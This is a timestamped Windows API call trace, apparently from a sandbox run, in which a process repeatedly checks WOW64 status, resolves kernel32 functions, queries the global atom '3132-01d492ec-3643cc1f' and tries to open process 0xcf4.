	[0141.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.339] CloseHandle (hObject=0x2dc) returned 1
	[0141.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.339] CloseHandle (hObject=0x2dc) returned 1
	[0141.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.340] CloseHandle (hObject=0x2dc) returned 1
	[0141.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.340] CloseHandle (hObject=0x2dc) returned 1
	[0141.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.340] CloseHandle (hObject=0x2dc) returned 1
	[0141.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.340] CloseHandle (hObject=0x2dc) returned 1
	[0141.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.341] CloseHandle (hObject=0x2dc) returned 1
	[0141.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.341] CloseHandle (hObject=0x2dc) returned 1
	[0141.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.341] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.341] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.342] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.342] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.342] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.342] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.343] CloseHandle (hObject=0x2dc) returned 1
	[0141.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.343] CloseHandle (hObject=0x2dc) returned 1
	[0141.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.343] CloseHandle (hObject=0x2dc) returned 1
	[0141.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.343] CloseHandle (hObject=0x2dc) returned 1
	[0141.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.344] CloseHandle (hObject=0x2dc) returned 1
	[0141.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.344] CloseHandle (hObject=0x2dc) returned 1
	[0141.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.377] CloseHandle (hObject=0x2dc) returned 1
	[0141.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.377] CloseHandle (hObject=0x2dc) returned 1
	[0141.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.377] CloseHandle (hObject=0x2dc) returned 1
	[0141.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.377] CloseHandle (hObject=0x2dc) returned 1
	[0141.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.378] CloseHandle (hObject=0x2dc) returned 1
	[0141.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.378] CloseHandle (hObject=0x2dc) returned 1
	[0141.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.378] CloseHandle (hObject=0x2dc) returned 1
	[0141.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.379] CloseHandle (hObject=0x2dc) returned 1
	[0141.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.379] CloseHandle (hObject=0x2dc) returned 1
	[0141.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.379] CloseHandle (hObject=0x2dc) returned 1
	[0141.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.379] CloseHandle (hObject=0x2dc) returned 1
	[0141.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.380] CloseHandle (hObject=0x2dc) returned 1
	[0141.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.380] CloseHandle (hObject=0x2dc) returned 1
	[0141.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.380] CloseHandle (hObject=0x2dc) returned 1
	[0141.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.380] CloseHandle (hObject=0x2dc) returned 1
	[0141.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.381] CloseHandle (hObject=0x2dc) returned 1
	[0141.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.381] CloseHandle (hObject=0x2dc) returned 1
	[0141.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.381] CloseHandle (hObject=0x2dc) returned 1
	[0141.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.381] CloseHandle (hObject=0x2dc) returned 1
	[0141.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.382] CloseHandle (hObject=0x2dc) returned 1
	[0141.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.382] CloseHandle (hObject=0x2dc) returned 1
	[0141.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.382] CloseHandle (hObject=0x2dc) returned 1
	[0141.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.383] CloseHandle (hObject=0x2dc) returned 1
	[0141.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.383] CloseHandle (hObject=0x2dc) returned 1
	[0141.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.383] CloseHandle (hObject=0x2dc) returned 1
	[0141.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.383] CloseHandle (hObject=0x2dc) returned 1
	[0141.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.384] CloseHandle (hObject=0x2dc) returned 1
	[0141.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.384] CloseHandle (hObject=0x2dc) returned 1
	[0141.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.384] CloseHandle (hObject=0x2dc) returned 1
	[0141.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.384] CloseHandle (hObject=0x2dc) returned 1
	[0141.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.385] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.385] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.386] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.386] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.386] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.386] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.386] CloseHandle (hObject=0x2dc) returned 1
	[0141.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.387] CloseHandle (hObject=0x2dc) returned 1
	[0141.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.387] CloseHandle (hObject=0x2dc) returned 1
	[0141.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.387] CloseHandle (hObject=0x2dc) returned 1
	[0141.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.388] CloseHandle (hObject=0x2dc) returned 1
	[0141.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.388] CloseHandle (hObject=0x2dc) returned 1
	[0141.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.420] CloseHandle (hObject=0x2dc) returned 1
	[0141.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.421] CloseHandle (hObject=0x2dc) returned 1
	[0141.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.421] CloseHandle (hObject=0x2dc) returned 1
	[0141.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.421] CloseHandle (hObject=0x2dc) returned 1
	[0141.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.421] CloseHandle (hObject=0x2dc) returned 1
	[0141.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.422] CloseHandle (hObject=0x2dc) returned 1
	[0141.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.422] CloseHandle (hObject=0x2dc) returned 1
	[0141.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.422] CloseHandle (hObject=0x2dc) returned 1
	[0141.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.423] CloseHandle (hObject=0x2dc) returned 1
	[0141.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.423] CloseHandle (hObject=0x2dc) returned 1
	[0141.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.423] CloseHandle (hObject=0x2dc) returned 1
	[0141.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.423] CloseHandle (hObject=0x2dc) returned 1
	[0141.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.424] CloseHandle (hObject=0x2dc) returned 1
	[0141.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.424] CloseHandle (hObject=0x2dc) returned 1
	[0141.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.424] CloseHandle (hObject=0x2dc) returned 1
	[0141.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.424] CloseHandle (hObject=0x2dc) returned 1
	[0141.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.425] CloseHandle (hObject=0x2dc) returned 1
	[0141.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.425] CloseHandle (hObject=0x2dc) returned 1
	[0141.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.425] CloseHandle (hObject=0x2dc) returned 1
	[0141.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.426] CloseHandle (hObject=0x2dc) returned 1
	[0141.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.426] CloseHandle (hObject=0x2dc) returned 1
	[0141.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.426] CloseHandle (hObject=0x2dc) returned 1
	[0141.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.426] CloseHandle (hObject=0x2dc) returned 1
	[0141.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.427] CloseHandle (hObject=0x2dc) returned 1
	[0141.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.427] CloseHandle (hObject=0x2dc) returned 1
	[0141.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.427] CloseHandle (hObject=0x2dc) returned 1
	[0141.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.427] CloseHandle (hObject=0x2dc) returned 1
	[0141.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.428] CloseHandle (hObject=0x2dc) returned 1
	[0141.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.428] CloseHandle (hObject=0x2dc) returned 1
	[0141.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.428] CloseHandle (hObject=0x2dc) returned 1
	[0141.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.429] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.429] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.429] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.430] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.430] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.430] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.430] CloseHandle (hObject=0x2dc) returned 1
	[0141.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.430] CloseHandle (hObject=0x2dc) returned 1
	[0141.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.431] CloseHandle (hObject=0x2dc) returned 1
	[0141.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.431] CloseHandle (hObject=0x2dc) returned 1
	[0141.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.431] CloseHandle (hObject=0x2dc) returned 1
	[0141.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.431] CloseHandle (hObject=0x2dc) returned 1
	[0141.464] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.465] CloseHandle (hObject=0x2dc) returned 1
	[0141.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.465] CloseHandle (hObject=0x2dc) returned 1
	[0141.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.465] CloseHandle (hObject=0x2dc) returned 1
	[0141.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.465] CloseHandle (hObject=0x2dc) returned 1
	[0141.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.466] CloseHandle (hObject=0x2dc) returned 1
	[0141.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.466] CloseHandle (hObject=0x2dc) returned 1
	[0141.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.466] CloseHandle (hObject=0x2dc) returned 1
	[0141.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.466] CloseHandle (hObject=0x2dc) returned 1
	[0141.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.467] CloseHandle (hObject=0x2dc) returned 1
	[0141.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.467] CloseHandle (hObject=0x2dc) returned 1
	[0141.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.467] CloseHandle (hObject=0x2dc) returned 1
	[0141.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.467] CloseHandle (hObject=0x2dc) returned 1
	[0141.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.468] CloseHandle (hObject=0x2dc) returned 1
	[0141.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.468] CloseHandle (hObject=0x2dc) returned 1
	[0141.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.468] CloseHandle (hObject=0x2dc) returned 1
	[0141.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.469] CloseHandle (hObject=0x2dc) returned 1
	[0141.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.469] CloseHandle (hObject=0x2dc) returned 1
	[0141.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.469] CloseHandle (hObject=0x2dc) returned 1
	[0141.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.469] CloseHandle (hObject=0x2dc) returned 1
	[0141.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.470] CloseHandle (hObject=0x2dc) returned 1
	[0141.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.470] CloseHandle (hObject=0x2dc) returned 1
	[0141.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.470] CloseHandle (hObject=0x2dc) returned 1
	[0141.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.470] CloseHandle (hObject=0x2dc) returned 1
	[0141.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.471] CloseHandle (hObject=0x2dc) returned 1
	[0141.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.471] CloseHandle (hObject=0x2dc) returned 1
	[0141.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.471] CloseHandle (hObject=0x2dc) returned 1
	[0141.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.471] CloseHandle (hObject=0x2dc) returned 1
	[0141.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.472] CloseHandle (hObject=0x2dc) returned 1
	[0141.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.472] CloseHandle (hObject=0x2dc) returned 1
	[0141.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.472] CloseHandle (hObject=0x2dc) returned 1
	[0141.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.473] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.473] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.473] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.474] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.474] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.474] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.474] CloseHandle (hObject=0x2dc) returned 1
	[0141.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.474] CloseHandle (hObject=0x2dc) returned 1
	[0141.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.475] CloseHandle (hObject=0x2dc) returned 1
	[0141.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.475] CloseHandle (hObject=0x2dc) returned 1
	[0141.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.475] CloseHandle (hObject=0x2dc) returned 1
	[0141.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.475] CloseHandle (hObject=0x2dc) returned 1
	[0141.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.508] CloseHandle (hObject=0x2dc) returned 1
	[0141.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.508] CloseHandle (hObject=0x2dc) returned 1
	[0141.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.508] CloseHandle (hObject=0x2dc) returned 1
	[0141.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.508] CloseHandle (hObject=0x2dc) returned 1
	[0141.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.509] CloseHandle (hObject=0x2dc) returned 1
	[0141.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.509] CloseHandle (hObject=0x2dc) returned 1
	[0141.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.509] CloseHandle (hObject=0x2dc) returned 1
	[0141.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.509] CloseHandle (hObject=0x2dc) returned 1
	[0141.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.510] CloseHandle (hObject=0x2dc) returned 1
	[0141.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.510] CloseHandle (hObject=0x2dc) returned 1
	[0141.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.510] CloseHandle (hObject=0x2dc) returned 1
	[0141.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.511] CloseHandle (hObject=0x2dc) returned 1
	[0141.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.511] CloseHandle (hObject=0x2dc) returned 1
	[0141.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.511] CloseHandle (hObject=0x2dc) returned 1
	[0141.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.511] CloseHandle (hObject=0x2dc) returned 1
	[0141.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.512] CloseHandle (hObject=0x2dc) returned 1
	[0141.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.512] CloseHandle (hObject=0x2dc) returned 1
